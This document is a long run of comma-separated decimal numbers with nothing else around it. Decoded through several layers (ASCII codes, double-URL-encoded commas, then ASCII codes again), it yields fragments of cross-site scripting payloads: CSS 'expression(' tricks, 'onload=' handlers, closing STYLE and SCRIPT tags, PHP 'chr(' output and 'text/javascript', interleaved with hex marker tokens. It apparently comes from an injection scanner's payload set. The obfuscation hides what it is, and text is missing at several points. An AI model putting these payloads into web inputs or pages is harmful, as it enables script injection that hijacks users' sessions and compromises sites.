53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,52,56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4,50,37,50,53,50,67,54,48,37,50,53,50,67,56,52,37,50,53,50,67,54,56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2,56,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50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3,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,52,57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49,49,57,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,52,37,50,53,50,67,53,56,37,50,53,50,67,51,50,37,50,53,50,67,49,48,49,37,50,53,50,67,49,50,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,52,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,53,52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48,37,50,53,50,67,56,50,37,50,53,50,67,54,53,37,50,53,50,67,55,55,37,50,53,50,67,54,57,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,55,51,37,50,53,50,67,55,48,37,50,53,50,67,56,50,37,50,53,50,67,54,53,37,50,53,50,67,55,55,37,50,53,50,67,54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2,55,37,50,53,50,67,51,50,37,50,53,50,67,52,55,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,49,48,48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2,55,37,50,53,50,67,51,50,37,50,53,50,67,51,52,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,53,49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2,55,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,53,50,37,50,53,50,67,53,50,37,50,53,50,67,57,57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1,50,37,50,53,50,67,51,52,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,53,53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2,55,37,50,53,50,67,51,50,37,50,53,50,67,51,52,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,52,56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4,48,37,50,53,50,67,54,51,37,50,53,50,67,49,49,50,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,50,37,50,53,50,67,51,50,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,49,37,50,53,50,67,51,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,52,37,50,53,50,67,52,48,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,52,49,37,50,53,50,67,54,51,37,50,53,50,67,54,50,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,53,54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8,50,37,50,53,50,67,49,49,52,37,50,53,50,67,57,55,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,49,37,50,53,50,67,54,48,37,50,53,50,67,54,51,37,50,53,50,67,49,49,50,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,50,37,50,53,50,67,51,50,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,49,37,50,53,50,67,51,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,52,37,50,53,50,67,52,48,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,52,49,37,50,53,50,67,54,51,37,50,53,50,67,54,50,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,52,37,50,53,50,67,57,55,37,50,53,50,67,49,48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48,37,50,53,50,67,56,50,37,50,53,50,67,54,53,37,50,53,50,67,55,55,37,50,53,50,67,54,57,37,50,53,50,67,56,51,37,50,53,50,67,54,57,37,50,53,50,67,56,52,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,55,48,37,50,53,50,67,56,50,37,50,53,50,67,54,53,37,50,53,50,67,55,55,37,50,53,50,67,54,57,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,53,55,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,55,48,37,50,53,50,67,56,50,37,50,53,50,67,54,53,37,50,53,50,67,55,55,37,50,53,50,67,54,57,37,50,53,50,67,56,51,37,50,53,50,67,54,57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3,55,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,49,48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2,37,50,53,50,67,54,53,37,50,53,50,67,54,54,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,56,52,37,50,53,50,67,54,56,37,50,53,50,67,51,50,37,50,53,50,67,54,54,37,50,53,50,67,54,53,37,50,53,50,67,54,55,37,50,53,50,67,55,53,37,50,53,50,67,55,49,37,50,53,50,67,56,50,37,50,53,50,67,55,57,37,50,53,50,67,56,53,37,50,53,50,67,55,56,37,50,53,50,67,54,56,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,53,51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1,56,37,50,53,50,67,51,53,37,50,53,50,67,52,57,37,50,53,50,67,53,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,52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49,49,57,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,52,37,50,53,50,67,53,56,37,50,53,50,67,51,50,37,50,53,50,67,49,48,49,37,50,53,50,67,49,50,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,52,48,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,57,56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2,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,50,48,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,53,37,50,53,50,67,53,56,37,50,53,50,67,49,48,49,37,50,53,50,67,49,50,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,52,37,50,53,50,67,52,55,37,50,53,50,67,52,50,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,52,50,37,50,53,50,67,52,55,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,52,48,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,52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2,56,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,52,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,50,48,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,53,37,50,53,50,67,53,56,37,50,53,50,67,49,48,49,37,50,53,50,67,49,50,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,52,48,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,52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6,52,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,51,50,37,50,53,50,67,56,52,37,50,53,50,67,56,57,37,50,53,50,67,56,48,37,50,53,50,67,54,57,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,50,48,37,50,53,50,67,49,49,54,37,50,53,50,67,52,55,37,50,53,50,67,49,48,54,37,50,53,50,67,57,55,37,50,53,50,67,49,49,56,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,57,57,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,54,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,53,52,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,56,51,37,50,53,50,67,56,52,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54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6,52,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,54,50,37,50,53,50,67,52,54,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,